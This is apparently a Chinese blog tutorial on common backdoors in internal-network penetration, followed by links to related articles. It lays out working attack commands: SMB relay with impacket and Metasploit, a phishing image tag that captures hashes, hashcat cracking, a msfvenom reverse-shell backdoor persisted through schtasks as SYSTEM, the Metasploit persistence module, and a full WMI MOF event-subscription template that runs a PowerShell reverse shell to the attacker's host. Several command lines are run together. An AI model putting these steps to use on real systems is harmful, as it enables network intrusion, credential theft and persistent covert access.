内网渗透----常见后门
0x01.综合利用手法
1.Smbrelay
smbrelayx.py
由于此手法是中间件攻击,需要关闭SMB的签名措施,Windows Server默认开启,其他系统默认关闭,使用 nmap扫描一下未开启签名的机器:
nmap -sT -p 445 --open --script smb-security-mode.nse,smb-os-discovery.nse 192.168.91.0/24
关闭SMB签名方法:
修改注册表后重新启动:
注册表位置
HKEY_LOCAL_MACHIME\System\CurrentControlSet\Services\LanManServer\Paramete
EnableSecuritySignature = 0
RequireSecuritySignature = 0
使用impacket中的smbrelayx.py进行中继攻击,目标是192.168.91.131:(第一次使用需要安装 pip install .)
python smbrelayx.py -h 192.168.91.131 -c calc.exe
当其他服务器使用相同的密码访问此服务器时:192.168.91.128为kali
net use \\192.168.91.128/user:"Administrator" "ABCabc123"
Kali接收到Hash:
目标服务器出现calc进程:
可以将hash粘贴出来,使用hashcat进行字典攻击:
hashcat64.exe -a 0 -m 5600 hash.txt pass.txt
可制作钓鱼网站,包含以下内容
<img src="\\192.168.91.128\Admin$">
启动服务:
python smbrelayx.py -h 192.168.91.131
用户访问时:
2.smb_relay(MSF)
msfconsole
use exploit/windows/smb/smb_relay
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.111.41
set smbhost 192.168.111.150
run
当其他机器访问Kali的共享时,可获得目标机器的shell:
net use \\192.168.91.128/user:"Administrator" "ABCabc123"
sessions
sessions -i 1
可以搭配NBNS欺骗、DNS欺骗使用
0x02.Waitfor后门
net use * /delete //清空共享
waitfor 123456 && calc.exe //本地执行
waitfor /s 127.0.0.1 /si college //测试
waitfor /s 192.168.91.131 /si 123456 /U Administrator /P ABCabc123
0x03.At && Schtasks(需要管理员权限)
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.91.128 lport=4444 -f exe -o backdoor.exe
将远控程序上传至服务器,使用schtasks,要求在用户登录时执行程序,返回shell。
schtasks /create /tn hello /tr C:\Users\admin\Desktop\backdoor.exe /sc onlogon /ru system
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.91.128
set lport 4444
run
0x03.Metasploit后门模块
当获得了一个meterpreter时,可设置后门程序:
background
use exploit/windows/local/persistenceshow
options
set session 6
set delay 60run
0x04.WMI+MOF
假设已经获得了管理员权限,可构造MOF后门,MOF文件模板如下:1.mof
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Cons
{Name = "Powershell Helper";RunInteractively=false;CommandLineTemplate="cmd /C 命令";
};
instance of __EventFilter as $Filt
{Name = "EventFilter";EventNamespace = "Root\\Cimv2";Query ="SELECT * FROM __InstanceCreationEvent Within 5" "Where TargetInstance Isa \"Win32_Process\" ""And Targetinstance.Name = \"notepad.exe\" ";QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding {Filter = $Filt;Consumer = $Cons;
};
利用msfvenom生成powershell反弹shell的命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.91.128 lport=6677 -f psh-cmd
将生成的powershell部分替换模板中的“命令”部分:
将mof上传至服务器,在服务器中以管理员身份启动CMD,运行:
mofcomp 1.mof
监听端口,待服务器打开notepad.exe:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.91.128
set lport 6677
run
其他事件,实测只能监听一个事件:
关闭powershell:
#!sql"SELECT * FROM __InstanceDeletionEvent Within 5 " "Where TargetInstance Isa \"Win32_Process\" ""And Targetinstance.Name = \"powershell.exe\" ";
每小时的30分钟:
#!sql"Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Minute = 30 "
内网渗透----常见后门相关推荐
- 【湃哒星说安全】工作组环境中进行内网渗透常见方法总结
0x01 工作组定义 工作组是一组计算机的集合,工作组中的计算机没有中央身份验证在网络中的地位平等,工作组中的每台计算机都充当客户端和服务器,每台机器的账号密码只是保存在自己的SAM文件中,当工作组中 ...
- 1.我所了解的内网渗透
最近看了一点内网渗透的学习资料,感觉内网渗透需要的知识太多,遂写博客来记录下自己学习内网渗透的一些笔记. 开篇首先推荐i春秋陈小兵老师在技术沙龙上的分享:https://www.ichunqiu.co ...
- 内网渗透系列之mimikatz的使用以及后门植入
内网渗透系列之mimikatz的使用以及后门植入 文章目录 内网渗透系列之mimikatz的使用以及后门植入 前言 mimikatz的使用 后门植入 msf永久后门植入 (1)Meterpreter后 ...
- 安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...
1 基础知识 1.1 网络 熟悉常见网络协议: https://www.ietf.org/standards/rfcs/ 1.2 操作系统 1.3 编程 2 恶意软件分析 2.1 分类 2.1.1 木 ...
- pyqt 把控制台信息显示到_内网渗透初识—信息收集
进入到内网后,首先要对自己当前所处的网络环境有一个清楚地判断,收集到有关当前环境足够多的信息,为接下来的渗透做好准备 PS:文中提到的PowerSploit 本机信息 包括操作系统,当前用户权限,内网 ...
- 内网渗透-域渗透简单思路
文章目录 1.权限提升 2.渗透姿势 爆hash,爆aes key 爆hash 爆aes key 3.远程登录 注册表修改 连接命令 4.连接操作 PTH攻击(利用明文或hash连接) IPC(明文连 ...
- linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结
在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索.Linux也是在内网渗透中很常见的操作 ...
- 内网安全-常见横向移动总结
域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳 ...
- 小迪渗透内网渗透(玖)
文章目录 65. 域环境&工作组&局域网方针(65-72) 演示案例: 涉及资源: 66. 横向批量&schtasks&im&packet 演示案例: 涉及资源 ...
最新文章
- Thrift抛直接内存OOM一点解决思路
- LeetCode实战:最长有效括号
- 如何将分表汇总到总表_轻松实现多表汇总数据(多表汇总成单表)
- 第九届蓝桥杯java B组—第六题递增三元组(详细介绍)
- Linux系统检测工具 三(Free,Top,ps,Vmstat,Sysstat)
- 《与mysql零距离接触》视屏学习笔记
- canny边缘检测_每日习题-图像处理-Canny边缘检测(2020.4.15)
- Gartner:全球晶圆代工市场排行榜?台积电保持第一、联电退居第三
- vs 自动生成core dump文件
- dll反编译工具java_JAVA反编译工具的使用
- ftl生成word文档
- matlab 神经网络工具箱 nntraintool 详解
- Android Studio制作.9图片,看这一篇就够了
- Zeppelin-0.9.0 开启kerberos登陆认证
- CSharp学习笔记
- 选购笔记本电脑型号的查询
- CES Asian 2018 见闻
- 2021年山东省职业院校技能大赛 中职组“网络搭建与应用”赛项 (正式赛题)
- Qt4.8.6 ARM(DM3730)中文显示,文泉驿正黑
- Delphi 控制摄像头操作
热门文章
- [财务][数据化分析][帆软]报表设计-聚合报表设计
- java考试成绩平均计算_Java计算平均成绩
- 请和我一起学习机器学习算法(决策树)
- antd 输入框只能输入英文、数字、下划线
- 用c++输出一个等腰三角形
- Flowing Paint ——感受抽象
- 2块盘的raid0坏了一块,数据如何恢复?
- 『Others』一键关闭所有应用程序
- BankCardUtils(根据银行卡号 获取 银行卡类型、银行名称和银行编码 自动格式化银行卡号、手机号、身份证号输入的工具类)
- 宝茱姐被丑不垃圾香菇蘑菇头拖下水